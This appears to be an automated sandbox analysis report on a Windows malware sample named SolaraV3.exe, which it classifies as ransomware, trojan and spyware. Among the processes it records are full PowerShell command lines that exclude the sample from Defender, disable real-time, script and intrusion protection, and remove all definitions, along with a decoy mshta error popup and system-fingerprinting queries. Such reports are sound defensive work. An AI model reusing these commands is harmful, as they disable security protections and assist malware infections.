              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE749B8110_2_00007FF74EE749B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9D97C110_2_00007FF74EE9D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAD91C110_2_00007FF74EEAD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7CB14110_2_00007FF74EE7CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEDAAC0110_2_00007FF74EEDAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB5A70110_2_00007FF74EEB5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAFA6C110_2_00007FF74EEAFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE967E0110_2_00007FF74EE967E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE817C8110_2_00007FF74EE817C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB190C110_2_00007FF74EEB190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA0904110_2_00007FF74EEA0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA38E8110_2_00007FF74EEA38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC18A8110_2_00007FF74EEC18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE82890110_2_00007FF74EE82890
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE78884110_2_00007FF74EE78884
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC260C110_2_00007FF74EEC260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA65FC110_2_00007FF74EEA65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9F5B0110_2_00007FF74EE9F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE88598110_2_00007FF74EE88598
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAF59C110_2_00007FF74EEAF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEAA710110_2_00007FF74EEAA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB0710110_2_00007FF74EEB0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB2700110_2_00007FF74EEB2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED86D4110_2_00007FF74EED86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE886C4110_2_00007FF74EE886C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC7660110_2_00007FF74EEC7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9C3E0110_2_00007FF74EE9C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEA0374110_2_00007FF74EEA0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE82360110_2_00007FF74EE82360
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC832C110_2_00007FF74EEC832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7A504110_2_00007FF74EE7A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB5468110_2_00007FF74EEB5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE9D458110_2_00007FF74EE9D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EED41CC110_2_00007FF74EED41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB81CC110_2_00007FF74EEB81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB2164110_2_00007FF74EEB2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC1314110_2_00007FF74EEC1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE742E0110_2_00007FF74EE742E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8D2C0110_2_00007FF74EE8D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB02A4110_2_00007FF74EEB02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEC2268110_2_00007FF74EEC2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE7F24C110_2_00007FF74EE7F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE97244110_2_00007FF74EE97244
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8E21C110_2_00007FF74EE8E21C
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B8124BE appears 84 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B814840 appears 129 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FF6DC702710 appears 104 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B811EF6 appears 1581 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0C3512EE appears 293 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FF6DC702910 appears 34 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B812739 appears 516 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0C3BDFBF appears 88 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B814D6D appears 34 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B813012 appears 55 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B81698D appears 49 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B81688E appears 31 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0C3BE055 appears 63 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B812A09 appears 172 times
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: String function: 00007FFB0B81405C appears 780 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: String function: 00007FF74EE88444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: String function: 00007FF74EEB49F4 appears 53 times
              Source: SolaraV3.exeStatic PE information: invalid certificate
              Source: rar.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: SolaraV3.exeBinary or memory string: OriginalFilename vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000000.1559321077.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
              Source: SolaraV3.exeBinary or memory string: OriginalFilename vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2052833376.00007FFB1AB18000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2050822213.00007FFB0C43D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2051568182.00007FFB0C5EB000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2053258667.00007FFB1BB2E000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2050061158.00007FFB0BFE8000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2051838761.00007FFB0C613000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2053545569.00007FFB1C267000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2052222811.00007FFB18B84000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2054325875.00007FFB1E4CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000000.1564954986.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2053814093.00007FFB1C3C7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2054068816.00007FFB1E47C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2047749339.00007FFB0B807000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV3.exe
              Source: SolaraV3.exe, 00000002.00000002.2051258231.00007FFB0C5B7000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV3.exe
              Source: SolaraV3.exeBinary or memory string: OriginalFilenamektmutil.exej% vs SolaraV3.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-1_1.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
              Source: libssl-1_1.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
              Source: python310.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
              Source: sqlite3.dll.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
              Source: unicodedata.pyd.1.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937050102833638
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8CAFC GetLastError,FormatMessageW,110_2_00007FF74EE8CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE8EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,110_2_00007FF74EE8EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEBB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,110_2_00007FF74EEBB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EE93144 GetDiskFreeSpaceExW,110_2_00007FF74EE93144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
              Source: C:\Users\user\Desktop\SolaraV3.exeFile created: C:\Users\user~1\AppData\Local\Temp\_MEI28842Jump to behavior
              Source: SolaraV3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\SolaraV3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: SolaraV3.exeReversingLabs: Detection: 55%
              Source: SolaraV3.exeString found in binary or memory: set-addPolicy
              Source: SolaraV3.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\SolaraV3.exeFile read: C:\Users\user\Desktop\SolaraV3.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
